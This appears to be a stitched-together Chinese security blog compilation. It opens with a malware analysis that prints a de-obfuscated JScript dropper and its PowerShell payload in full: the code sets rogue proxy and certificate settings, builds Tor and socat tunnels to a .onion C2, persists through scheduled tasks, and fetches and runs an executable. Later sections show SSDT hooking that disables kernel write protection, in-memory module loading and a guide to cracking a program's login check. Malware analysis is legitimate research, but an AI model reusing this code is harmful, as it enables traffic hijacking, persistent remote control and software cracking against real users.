            if(nNxFkACp.length>0){
                this.EdFcz(String.format("http://127.0.0.1:5555/{0}.js?ip={1}",SGUUmXppVIOh.PsdPmHMCVqenzuN(8),nNxFkACp));
            }
        }
    };
    this.EdFcz=function(s){
        sZTSiOfmguW.RegWrite(LbXYsoZotGh.nzJryrgLluyiPwC("SEtDVVxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxJbnRlcm5ldCBTZXR0aW5nc1xBdXRvQ29uZmlnVVJM"),s,"REG_SZ");
    };
    this.CXaBSojpHZJEm=function(){
        this.kZNsJyERrbjMEdZ=iOU+"\\"+this.kZNsJyERrbjMEdZ;
        var uIDujligs=LbXYsoZotGh.nzJryrgLluyiPwC(kVQNRMoBaO.moZgTncSGjjMW);
        uIDujligs=uIDujligs.replace("%CERT%",kVQNRMoBaO.oUXMMFdTE);
        SGUUmXppVIOh.Jer(this.kZNsJyERrbjMEdZ,uIDujligs);
        sZTSiOfmguW.Run("cmd /c powershell -ep Unrestricted -f \""+this.kZNsJyERrbjMEdZ+"\" | find /v \"\" >> \""+dEhkFnrZt+"\"",0,true);
    };
    this.BUUZMOIyOFXApCU=function(){
        if(VTU.FileExists(this.kZNsJyERrbjMEdZ)){
            VTU.DeleteFile(this.kZNsJyERrbjMEdZ);
        }
    };
}
function QPxG(){
    //修改火狐配置文件
    var SFrPOCQQqgWuzbr = DSoEmfpCHxm + "\\Mozilla\\Firefox\\Profiles";
    this.VqJKSQXiygGQzw=SGUUmXppVIOh.PsdPmHMCVqenzuN(8)+".ps1";

    this.FPdjKpheWo=function(){
        if(VTU.FolderExists(SFrPOCQQqgWuzbr)){
            var ArrFirefoxProfileList=VTU.GetFolder(SFrPOCQQqgWuzbr).SubFolders;
            if(ArrFirefoxProfileList.Count>0){
                var e = new Enumerator(ArrFirefoxProfileList);
                e.moveFirst();
                while (e.atEnd() == false){
                    var folder=e.item();
                    if(folder.Name.indexOf(".default")>-1){
                        return folder.Path;
                    }
                    e.moveNext();
                }
            }
        }
        return false;
    };
    this.InstallPac=function(){
        var StrProfile=this.FPdjKpheWo();
        if(StrProfile!=false){
            var StrPrefsJs=StrProfile+LbXYsoZotGh.nzJryrgLluyiPwC("XHByZWZzLmpz");
            if(VTU.FileExists(StrPrefsJs)){
                var StrContent=VTU.OpenTextFile(StrPrefsJs,1).ReadAll();
                var ArrContent=StrContent.split("\n");
                var NewArrContent=[];
                for(var i=0;i<ArrContent.length;i++){
                    if(ArrContent[i].indexOf("network.dns.blockDotOnion")!=-1){
                        ArrContent[i]=ArrContent[i].replace("true","false");
                    }
                    if(ArrContent[i].indexOf("network.proxy.")==-1 && ArrContent[i].indexOf("security.enterprise_roots.enabled")==-1){
                        NewArrContent.push(ArrContent[i]);
                    }

                }
                NewArrContent.push("user_pref(\"network.dns.blockDotOnion\", false);");
                NewArrContent.push("user_pref(\"security.enterprise_roots.enabled\", true);");
                StrContent=NewArrContent.join("\n");
                var stream=VTU.CreateTextFile(StrPrefsJs, true);
                stream.Write(StrContent);
                stream.Close();
            }
        }
    };
    this.InstallCert=function(){
        this.VqJKSQXiygGQzw=iOU+"\\"+this.VqJKSQXiygGQzw;
        var uIDujligs=LbXYsoZotGh.nzJryrgLluyiPwC(kVQNRMoBaO.dDrnVhWm);
        uIDujligs=uIDujligs.replace("%CERT%",kVQNRMoBaO.oUXMMFdTE);
        SGUUmXppVIOh.Jer(this.VqJKSQXiygGQzw,uIDujligs);
        sZTSiOfmguW.Run("cmd /c powershell -ep Unrestricted -f \""+this.VqJKSQXiygGQzw+"\" | find /v \"\" >> \""+dEhkFnrZt+"\"",0,true);
    };
    this.Close=function(){
        if(VTU.FileExists(this.VqJKSQXiygGQzw)){
            VTU.DeleteFile(this.VqJKSQXiygGQzw);
        }
    };
}
function C_TP(){
    this.FileName=SGUUmXppVIOh.PsdPmHMCVqenzuN(SGUUmXppVIOh.QVn(5,10))+".ps1";
    this.Install=function(){
        var indexDomain=SGUUmXppVIOh.QVn(0,kVQNRMoBaO.LgiwpoajBw.length-1);
        var Domain=kVQNRMoBaO.LgiwpoajBw[indexDomain];
        this.FileName=sZTSiOfmguW.ExpandEnvironmentStrings("%ALLUSERSPROFILE%")+"\\"+this.FileName;
        var uIDujligs=LbXYsoZotGh.nzJryrgLluyiPwC(kVQNRMoBaO.Ghq);
        uIDujligs=uIDujligs.replace(/%DOMAIN%/g,Domain);
        SGUUmXppVIOh.Jer(this.FileName,uIDujligs);
        sZTSiOfmguW.Run("cmd /c powershell -ep Unrestricted -f \""+this.FileName+"\" | find /v \"\" >> \""+dEhkFnrZt+"\"",0,true);
    };
    this.Close=function(){
        if(VTU.FileExists(this.FileName)){
            VTU.DeleteFile(this.FileName);
        }
    };
}
function Kvkvfz(){
    this.FileName=iOU+"\\"+SGUUmXppVIOh.PsdPmHMCVqenzuN(8)+".ps1";
    this.lfjxeqjOrhPGUA=function(){
        //查询ip
        CotZ=new pjWBhLWlAGVeKiN();
        PBPRfNXyqx=new QPxG();
        XVEbnkh=new C_TP();
    };
    //主函数
    this.dKrfMFdadkN=function(){

        if(this.CheckTest()){

            return false;

        }
        this.lfjxeqjOrhPGUA();
        XVEbnkh.Install();
        this.MXcIDEpEes();
        this.vhQUbnorFnIqy();
        this.fDBh();
        this.Close();

        this.sqtf();

    };
    this.vhQUbnorFnIqy=function(){
        CotZ.CXaBSojpHZJEm();
        CotZ.qtPLqwQxQHKKe();
    };
    this.fDBh=function(){
        PBPRfNXyqx.InstallCert();
        PBPRfNXyqx.InstallPac();
    };
    //写注册表
    this.MXcIDEpEes=function(){
        sZTSiOfmguW.Run(LbXYsoZotGh.nzJryrgLluyiPwC("dGFza2tpbGwgL0Y"+"gL2ltIGlleHBsb3JlLmV4ZQ=="),0,false);
        sZTSiOfmguW.Run(LbXYsoZotGh.nzJryrgLluyiPwC("dGFza2tpbGwgL0Yg"+"L2ltIGZpcmVmb3guZXhl"),0,false);
        sZTSiOfmguW.Run(LbXYsoZotGh.nzJryrgLluyiPwC("dGFza2tpbGwgL0YgL"+"2ltIGNocm9tZS5leGU="),0,false);
    };
    this.sqtf=function(){
        var bData=LbXYsoZotGh.nzJryrgLluyiPwC(kVQNRMoBaO.EMAoYeN);
        SGUUmXppVIOh.Jer(this.FileName,bData);
        sZTSiOfmguW.Run("powershell -ep Unrestricted -f \""+this.FileName+"\"",0,true);
        if(VTU.FileExists(this.FileName)){
            VTU.DeleteFile(this.FileName);
        }
    };
    //检测操作系统语言版本
    this.CheckTest=function(){
        var langs = GetObject("winmgmts:\\\\.\\root\\cimv2").ExecQuery("Select * from Win32_OperatingSystem");
        var arr = [];
        for (var enumItems = new Enumerator(langs) ; !enumItems.atEnd() ; enumItems.moveNext()) {
            var MUILanguages = enumItems.item().MUILanguages.toArray();
            for (i in MUILanguages) {
                arr.push(MUILanguages[i]);
            }
        }
        var muilangs = arr.join(",");
        if(muilangs=='en-US'){
            return true;
        }
        return false;
    }
    this.Close=function(){
        CotZ.BUUZMOIyOFXApCU();
        PBPRfNXyqx.Close();
        XVEbnkh.Close();
    };   
}
var eGHfyRDGqtYby = new Kvkvfz();
eGHfyRDGqtYby.dKrfMFdadkN();

com调用jscript代码

      1.  CoCreateInstance()创建javascript的引擎,获得jscript引擎的接口的IActiveScript 
      2.  实现回调调用接口IActiveScriptSite,通过IActiveScript->SetScriptSite()交给脚本回调
      3.  IActiveScript->QueryInterface()取得IActiveScriptParse接口,IActiveScriptParse接口用来解析执行jscript脚本

获得IActiveScript接口

先调用CLSIDFromProgID拿到对应脚本语言引擎接口的guid,这里是jscript,然后用CoCreateInstance创建一个脚本引擎实例,riid为IID_IActiveScript;
返回一个IActiveScript对象指针,



HRESULT __thiscall get_jscript_engine(LPVOID this, LPCOLESTR lpszProgID, LPUNKNOWN pUnkOuter, DWORD dwClsContext)
{
LPVOID ppv; // [esp+0h] [ebp-1Ch]
HRESULT v6; // [esp+4h] [ebp-18h]
const IID guid; // [esp+8h] [ebp-14h]

ppv
= this;
// lpSzProgID "jscript"
v6 = CLSIDFromProgID(lpszProgID, &guid);
if…
if ( v6 >= 0 )
// riid = '{BB1A2AE1-A4F9-11cf-8F20-00805F2CD064}';
v6 = CoCreateInstance(&guid, pUnkOuter, dwClsContext, &riid, ppv);
return v6;
}

run jscript脚本




int thiscall run_jscript(JSEngine this, encry_code a2)
{
int v3; // ST40_4
_DWORD *v4; // ST24_4
int (stdcall **v5)(_DWORD, void , int); // eax
int v6; // eax
int v7; // ST38_4
WCHAR lpWideCharStr; // ST34_4
int v9; // ST30_4
int v10; // ST2C_4

get_jscript_engine(&this->scriptEngine_, L"JScript", 0, 0x17u);
v3 = QueryInterface(&this->scriptEngine_);
// COleScript::SetScriptSite
((v3 + 0xC))(v3, this);
v4 = sub_10C3380(&this->field_C);
v5 = QueryInterface(&this->scriptEngine_);
COleScript::QueryInterface(v5, v4);
v6 = QueryInterface(&this->field_C);
// COleScript::InitNew
((v6 + 0xC))(v6);
v7 = a2->size;
lpWideCharStr = operator new[](2 (v7 + 1));
// 将jscript代码字符都转成unicode
MultiByteToWideChar(0, 0, a2->addr, -1, lpWideCharStr, v7 + 1);
v9 = QueryInterface(&this->field_C);
// COleScript::ParseScriptText
((v9 + 0x14))(v9, v9, lpWideCharStr, &dword_1103518, 0, 0, 0, 0, 2, 0, 0);
v10 = QueryInterface(&this->scriptEngine_);
// COleScript::SetScriptState
// 在这个函数内部执行jscript代码
return ((v10 + 20))(v10, 2);
}

脚本行为

脚本会释放出一个powershell脚本,可能是c2c连接已经失效,后续的行为没跑出来

$SH_TYPE_SCHEDULED_TASK=1;
$SH_TYPE_TASK_SCHEDULER=2;
$schedulerType=$SH_TYPE_SCHEDULED_TASK;
function FVRClsggMRAZ
{
param([string]$zipfile, [string]$destination);
$7z = Join-Path $env:ALLUSERSPROFILE '7za.exe';
if (-NOT (Test-Path $7z)){
Try
{
(New-Object System.Net.WebClient).DownloadFile('https://chocolatey.org/7za.exe',$7z);
}
Catch{}
}
if ($(Try { Test-Path $7z.trim() } Catch { $false })){
Start-Process "$7z" -ArgumentList "x -o`"$destination`" -y `"$zipfile`"" -Wait -NoNewWindow
}
else{
$shell = new-object -com shell.application;
$zip = $shell.NameSpace($zipfile);
foreach($item in $zip.items())
{
$shell.Namespace($destination).copyhere($item);
}
}
}
function Base64ToFile
{
param([string]$file, [string]$string);
$bytes=[System.Convert]::FromBase64String($string);
#set-content -encoding byte $file -value $bytes;
[IO.File]::WriteAllBytes($file, $bytes);
}
function RandomString{
    param([int]$min=5, [int]$max=15);
    return (-join ((48..57)+(65..90)+(97..122) | Get-Random -Count (Get-Random -minimum $min -maximum $max) | % {[char]$_}));
}
function InitScheduller{
    try{
        Import-Module ScheduledTasks -ErrorAction Stop;
        return $SH_TYPE_SCHEDULED_TASK;
    }catch{
        $File=$env:Temp+'\'+(RandomString)+'.zip';
        $Dest=$env:Temp+'\'+(RandomString);
        while (!(iGgRLcyIJQBzrA 'https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg' $File)) {}
        if ((Test-Path $Dest) -eq 1){Remove-Item -Force -Recurse $Dest;}mkdir $Dest | Out-Null;
        FVRClsggMRAZ $File $Dest;
        Remove-Item -Force $File;
        $TSAssembly=$Dest+'\lib\net20\Microsoft.Win32.TaskScheduler.dll';
        $loadLib = [System.Reflection.Assembly]::LoadFile($TSAssembly);
        return $SH_TYPE_TASK_SCHEDULER;
    }
}
function xrnOlrj
{
param([string]$name, [string]$cmd, [string]$params='',[int]$restart=0,[int]$delay=0,[string]$dir='');
switch ($schedulerType) {
    $SH_TYPE_SCHEDULED_TASK {
        $Action = New-ScheduledTaskAction -Execute $cmd;
        if(-Not [String]::IsNullOrEmpty($params)){
            $Action.Arguments=$params;
        }
        if(-Not [String]::IsNullOrEmpty($dir)){
            $Action.WorkingDirectory=$dir;
        }
        $LogonTrigger = New-ScheduledTaskTrigger -AtLogOn;
        try{
            $LogonTrigger.UserId=$env:username;
        }catch{
            $LogonTrigger.User=$env:username;
        }
        if(-Not $delay -eq 0){
            $LogonTrigger.Delay=New-TimeSpan -Seconds $delay;
        }
        if($restart -eq 1){
            $TimeTrigger = New-ScheduledTaskTrigger -Once -At 12am -RepetitionInterval ([System.TimeSpan]::FromMinutes(1)) -RepetitionDuration ([System.TimeSpan]::FromDays(365 * 20));
        }
        $Settings = New-ScheduledTaskSettingsSet;
        $Settings.DisallowStartIfOnBatteries = $False;
        $Settings.StopIfGoingOnBatteries = $False;
        if($restart -eq 1){
            $Task = Register-ScheduledTask -Action $Action -Trigger $LogonTrigger,$TimeTrigger -Settings $Settings -TaskName $name -Description (RandomString);
        }else{
            $Task = Register-ScheduledTask -Action $Action -Trigger $LogonTrigger -Settings $Settings -TaskName $name -Description (RandomString);
        }
        Start-ScheduledTask -InputObject $Task;
    };
    Default {
        $ts=New-Object Microsoft.Win32.TaskScheduler.TaskService;
        $td=$ts.NewTask();
        $td.RegistrationInfo.Description = (RandomString);
        $td.Settings.DisallowStartIfOnBatteries = $False;
        $td.Settings.StopIfGoingOnBatteries = $False;
        $td.Settings.MultipleInstances = [Microsoft.Win32.TaskScheduler.TaskInstancesPolicy]::IgnoreNew;
        $LogonTrigger = New-Object Microsoft.Win32.TaskScheduler.LogonTrigger;
        $LogonTrigger.StartBoundary=[System.DateTime]::Now;
        $LogonTrigger.UserId=$env:username;
        $LogonTrigger.Delay=[System.TimeSpan]::FromSeconds($delay);
        $td.Triggers.Add($LogonTrigger);
        if($restart -eq 1){
        $TimeTrigger = New-Object Microsoft.Win32.TaskScheduler.TimeTrigger;
        $TimeTrigger.StartBoundary=[System.DateTime]::Now;
        $TimeTrigger.Repetition.Interval=[System.TimeSpan]::FromMinutes(1);
        $TimeTrigger.Repetition.StopAtDurationEnd=$False;
        $td.Triggers.Add($TimeTrigger);
        }
        $tsf="Microsoft.Win32.TaskScheduler";
        $ExecAction=New-Object "$tsf.ExecAction"($cmd,$params,$dir);
        $td.Actions.Add($ExecAction);
        $task=$ts.RootFolder.RegisterTaskDefinition($name, $td);
        $task.Run();
    };
}
}
function iGgRLcyIJQBzrA {
    param([string]$AETLcnitKnaNqr, [string]$aEntsBMtsayB);
    $ErrorActionPreference = "Stop";
    Write-Host ("Download {0} to {1}" -f ($AETLcnitKnaNqr, $aEntsBMtsayB));
    try {
        Start-BitsTransfer -Source $AETLcnitKnaNqr -Destination $aEntsBMtsayB;
    }
    catch {
        #Write-Error $_ -ErrorAction Continue;
        try {
            (New-Object System.Net.WebClient).DownloadFile($AETLcnitKnaNqr,$aEntsBMtsayB);
        }
        catch {
            #Write-Error $_ -ErrorAction Continue;
            Start-Process "cmd.exe" -ArgumentList "/b /c bitsadmin /transfer /download /priority HIGH `"$AETLcnitKnaNqr`" `"$aEntsBMtsayB`"" -Wait -WindowStyle Hidden;
        }
    }finally{
        $ErrorActionPreference = "Continue";
    }
    if ( $(Try { Test-Path $aEntsBMtsayB.trim() } Catch { $false })){
        return $true;
    }
    return $false;
}
function IwoPMc{
$schedulerType = InitScheduller;
$tf=$env:Temp+'\'+(RandomString)+'.zip';
$DestTP=$env:ALLUSERSPROFILE+'\'+(RandomString);
$TorMirrors=@("https://dist.torproject.org/",
"https://torproject.mirror.metalgamer.eu/dist/",
"https://tor.ybti.net/dist/");
foreach ($mirror in $TorMirrors) {
    $_url=$mirror+'torbrowser/7.0.11/tor-win32-0.3.1.9.zip';
    if((iGgRLcyIJQBzrA $_url $tf)){
        break;
    }
}
if ((Test-Path $DestTP) -eq 1){Remove-Item -Force -Recurse $DestTP;}mkdir $DestTP | Out-Null;
FVRClsggMRAZ $tf $DestTP;
Remove-Item -Force $tf;
$ykF=$DestTP+'\Tor\';
$WqPfv="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"tor.exe`",0,False))";
xrnOlrj (RandomString) 'mshta.exe' $WqPfv 0 0 $ykF;
$SFile=$env:Temp+'\'+(RandomString)+'.zip';
while (!(iGgRLcyIJQBzrA 'https://github.com/StudioEtrange/socat-windows/archive/1.7.2.1.zip' $SFile)){}
FVRClsggMRAZ $SFile $DestTP;
$s_old=$DestTP+'\socat-windows-1.7.2.1\';
$s_new=(RandomString);
Remove-Item -Force $SFile;
Rename-Item -path $s_old -newName $s_new;
$dLkdOdvs=$DestTP+'\'+$s_new+'\';
$s1cmd='socat tcp4-LISTEN:5555,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:qr5c2etn6x5lhhfc.onion:80,socksport=9050';
$s2cmd='socat tcp4-LISTEN:5588,reuseaddr,fork,keepalive,bind=127.0.0.1 SOCKS4A:127.0.0.1:qr5c2etn6x5lhhfc.onion:5588,socksport=9050';
$SyASxV="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"$s1cmd`",0,False))";
$CkeHaEMoQb="vbscript:close(CreateObject(`"WScript.Shell`").Run(`"$s2cmd`",0,False))";
xrnOlrj (RandomString) 'mshta.exe' $SyASxV 0 0 $dLkdOdvs;
xrnOlrj (RandomString) 'mshta.exe' $CkeHaEMoQb 0 0 $dLkdOdvs;
$wXdRbCFwn="vbsc"+"ript:close(CreateObject(`"WScript.Shell`").Run(`"powershell.exe `"`"`$F=`$env:Temp+'\\"+(RandomString)+".exe';rm -Force `$F;`$cl=(New-Object Net.WebClient);`$cl.DownloadFile('http://127.0.0.1:5555/"+(RandomString)+".asp?ts&ip='+`$cl.Download`"+`"String('http://api.ipify.org/'),`$F);& `$F`"`"`",0,False))";
xrnOlrj (RandomString) 'mshta.exe' $wXdRbCFwn 1;
}
IwoPMc;

参考连接

  1. https://stackoverflow.com/questions/16846386/run-javascript-function-from-c-without-mfc

windows内核学习:SSDT Hook

内核函数HOOK


static ZWCREATEFILE                OldZwCreateFile; //原函数地址

NTSTATUS Hook_ZwWriteFile(
  IN HANDLE              FileHandle,
  IN HANDLE              Event OPTIONAL,
  IN PIO_APC_ROUTINE      ApcRoutine OPTIONAL,
  IN PVOID                ApcContext OPTIONAL,
  OUT PIO_STATUS_BLOCK    IoStatusBlock,
  IN PVOID                Buffer,
  IN ULONG                Length,
  IN PLARGE_INTEGER      ByteOffset OPTIONAL,
  IN PULONG              Key OPTIONAL )
{
    NTSTATUS rc;
    rc = OldZwWriteFile(FileHandle,Event,ApcRoutine,ApcContext,IoStatusBlock,Buffer,Length,ByteOffset,Key);
    return rc;
}


void StartHook (void)
{
    //获取未导出的服务函数索引号
    HANDLE    hFile;
    PCHAR    pDllFile;
    ULONG  ulSize;
    ULONG  ulByteReaded;

    __asm
    {
        push    eax
        mov        eax, CR0
        and        eax, 0FFFEFFFFh
        mov        CR0, eax
        pop        eax
    }
    //用我们自己写的hook函数替换原函数地址,并把原函数地址返回
    OldZwCreateFile    = (ZWCREATEFILE) InterlockedExchange((PLONG)
                              &SDT(ZwCreateFile),
                              (LONG)Hook_ZwCreateFile);

    //关闭
    __asm
    {
        push       eax
        mov        eax, CR0
        or         eax, NOT 0FFFEFFFFh
        mov        CR0, eax
        pop        eax
    }
    return ;
}

windows内核学习:内存操作

在内核中有以下四种内存操作

PVOID ExAllocatePool(POOL_TYPE PoolType, SIZE_T NumberOfBytes);
VOID RtlMoveMemory(PVOID Destination, PVOID Source, SIZE_T Length);
VOID RtlFillMemory(PVOID Destination, SIZE_T Length, UCHAR Fill);
VOID ExFreePool(PVOID P);

分别对应C语言的malloc memcpy memset free;

POOL_TYPE常用的有两种:PagedPool 和 NonPagedPool。在内核层内存都是可写可读可执行的。没有类似VirtualProtect的函数。

void test()
{
    PVOID ptr1 = ExAllocatePool(PagedPool,0x100);
    PVOID ptr2 = ExAllocatePool(NonPagedPool,0x200);
    RtlFillMemory(ptr2,0x200,0x90);
    RtlMoveMemory(ptr1,ptr2,0x50);
    ExFreePool(ptr1);
    ExFreePool(ptr2);
}

一般来说,要写入“别人的”内核内存, 必须关闭内存写保护,并把 IRQL 提升到 2 才行(绝大多数时候 IRQL 都为 0, 当 IRQL=2 时,会阻断大部分线程执行, 防止执行出错)。 内存是否处于写保护的状态记录在 CR0 寄存器上,因此直接修改 CR0 寄存器的值即可;而提升或降低IRQL 则使用 KeRaiseIrqlToDpcLevel 和 KeLowerIrql 实现( WIN64 的 IRQL 值记录在 CR8 寄存器上, 而 WIN32 的 IRQL 值记录在 KPCR 上)。

KIRQL WPOFFx64()
{
    KIRQL irql=KeRaiseIrqlToDpcLevel();
    UINT64 cr0=__readcr0();
    cr0 &= 0xfffffffffffeffff;
    __writecr0(cr0);
    _disable();
    return irql;
}
void WPONx64(KIRQL irql)
{
    UINT64 cr0=__readcr0();
    cr0 |= 0x10000;
    _enable();
    __writecr0(cr0);
    KeLowerIrql(irql);
}
void test()
{
   KIRQL irql=WPOFF();
   RtlMoveMemory(NtOpenProcess,HookCode,15);
   WPON(irql);
}

MDL:
申请一个 MDL(类似句柄的玩意),然后尝试锁定页面,如果成功,则让系统分配一个“安全” 的虚拟地址再行写入, 写入完毕后解锁页面并释放掉 MDL。

BOOLEAN SafeCopyMemory( PVOID pDestination, PVOID pSourceAddress, SIZE_T SizeOfCopy )
{
    PMDL pMdl = NULL;
    PVOID pSafeAddress = NULL;
   if( !MmIsAddressValid(pDestination) || !MmIsAddressValid(pSourceAddress) )
      return FALSE;
    pMdl = IoAllocateMdl(pDestination, (ULONG)SizeOfCopy, FALSE, FALSE, NULL );
      if( !pMdl )
     return FALSE;
  __try
{
     MmProbeAndLockPages( pMdl, KernelMode, IoReadAccess );
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
    IoFreeMdl( pMdl );
    return FALSE;
}
    pSafeAddress = MmGetSystemAddressForMdlSafe( pMdl, NormalPagePriority );
    if( !pSafeAddress )
     return FALSE;
__try
{
    RtlMoveMemory(pSafeAddress, pSourceAddress, SizeOfCopy );
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
   ;
}
    MmUnlockPages( pMdl );
   IoFreeMdl( pMdl );
   return TRUE;
}

windows内核学习:文件操作

文件基本操作

在进行各类文件操作前,我们需要使用ZwCreateFile创建或打开文件获得文件句柄。然后使用该句柄进行各类操作

创建文件

创建文件对象必须要调用RtlInitUnicodeString初始化OBJECT_ATTRIBUTES结构体,


NTSTATUS ntCreateFile(WCHAR *szFileName)
{
        OBJECT_ATTRIBUTES        objAttrib = { 0 };
        UNICODE_STRING            uFileName = { 0 };
        IO_STATUS_BLOCK         io_status = { 0 };
        HANDLE                    hFile = NULL;
        NTSTATUS                status = 0;

        RtlInitUnicodeString(&uFileName, szFileName);
        InitializeObjectAttributes(
            &objAttrib,
            &uFileName,
            OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
            NULL,
            NULL
        );

        status = ZwCreateFile(
            &hFile,
            GENERIC_WRITE,
            &objAttrib,
            &io_status,
            NULL,
            FILE_ATTRIBUTE_NORMAL,
            FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
            FILE_OPEN_IF,
            FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE,
            NULL,
            0);

        if (NT_SUCCESS(status))
        {
            ZwClose(hFile);
        }

        return status;
}

病毒样本快到碗里来,一个样本下载爬虫的实现


简介

Malwar是一个使用了Cuckoo Sanbox的在线恶意软件分析系统,由于它提供一些病毒样本下载,就想能不能写个爬虫把样本下下来。顺便写篇博客记录下。
页面分析

打开 https://malwr.com/analysis ,我们可以当前页看到有TimeStamp、md5、文件名、文件类型和杀软查杀数,下一页类似。
图片说明

只有MD5的超链接可以点,点进去看看,
图片说明

我写这个的爬虫的目的是下载样本,只关心样本的下载地址,并不关心其他的信息。

现在我们可以理清下思路:

   获取每一页的网页源码
   解析当前页的每一个md5对应的详细信息链接
   在详细信息页面解析下载地址。

一款勒索软件的分析-未完待续

文件信息 SHA1:1d03f92b8f824bb065552f0d9e6ddddb

NSIS脚本分析

使用7zip解压,可以看到其中一个文件是乱码,可能是加密的shellcode。

图片说明

下图是nsis的脚本,前面有很多都是无用的代码,一般都是首先看.oninit回调函数。

我们可以看到它通过wsprintf来拼接字符串,使用nsis的system.dll来调用外部dll。 将加密的shellcode映射到内存,

图片说明

AOSP-docker编译安卓源码绕过反调试

看了很多编译源码的文章,发现很多都有坑,大部分都是环境配置问题,编译不同版本的源码jdk版本不一样,ubuntu版本也不一样。这很让人蛋疼,光是折腾环境就得半天了。

自从有了docker就不一样了,有人把Android源码编译的环境打包成了docker,就是AOSP docker;这样我们就不需要去折腾环境,直接拿人家弄好的来用。

推荐使用linux装docker,不用管是debian还是ubuntu;虽然windows也可以使用docker,但是还是有点小问题。

内存中加载modlue

内存中加载modlue

    $Domain = [AppDomain]::CurrentDomain
    $DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly')
    $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule')

    $ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll')
    $TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public)
    $TypeBuilder.CreateType()
    $HelloDllBytes = [Convert]::FromBase64String('{PE base64}')
    # Calling LoadModule doesn't pass through the internal nLoad method like Assembly/AppDomain.Load does. :)
    $HelloDllModule = [TempClass].Assembly.LoadModule('hello.dll', $HelloDllBytes)
    # Invoke the Hello method within the hello.dll module that was loaded in memory
    $HelloDllModule.GetTypes()[0].GetMethod('Hello').Invoke($null, @())


豆约翰博客备份专家破解

文笔不好,路过的看官求勿喷。

官网下载程序,解压用dnspy来调试主程序BlogDownloader.exe;虽然被混淆,但这样的保护形同虚设,很容易通过动态调试被破解。

F5开始调试。

点击ok,程序会出现登陆框,要输入账号密码。第一步我们先实现免账号登陆,先随便输个账号密码,利用堆栈回溯来找到下图中高亮部分,这里面就是登陆流程部分。

跳转到目标代码,很明显就是对账号密码的判断,我们只要将第一个判断语句的等于改成不等于,空账号登陆。


,